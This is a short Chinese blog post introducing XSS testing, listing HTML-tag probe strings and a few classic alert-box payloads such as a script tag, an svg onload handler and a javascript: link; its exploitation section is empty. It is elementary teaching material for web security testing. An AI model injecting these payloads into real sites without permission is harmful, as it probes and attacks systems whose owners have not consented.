加载中...

xss漏洞基础

发表于2024-08-13|更新于2024-10-03

|阅读量:

一、测试语句

在网站是否存在xss漏洞时，应该输入如<,>输入后查看网页源代码是否过滤标签，如果没有，很大可能存在xss漏洞

常用的测试语句

<h1>1</h1>
<span>1</span>
<script>console.log(1)</script>
"><span>x</span><"
">"><span>x</span><"<"

二、攻击语句

输入测试语句未过滤后，为显示存在漏洞，需要插入攻击代码

常见语句

1
2
3

<script>alert(1)</script>
<svg onload=alert(1)>
<a href="javascript:alert(1)">aa</a>

三、利用

文章作者: 小chen

文章链接: http://blog.chenjichao.site/2024/08/13/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/web%E5%AE%89%E5%85%A8/%E4%BB%A3%E7%A0%81%E6%BC%8F%E6%B4%9E/xss%E8%B7%A8%E7%AB%99%E6%94%BB%E5%87%BB/xss%E6%B5%8B%E8%AF%95%E8%AF%AD%E5%8F%A5/

版权声明: 本博客所有文章除特别声明外，均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自小chen妙妙屋！

相关推荐

sql手工注入

php反序列化

xss-labs-master实战

评论

数据库加载中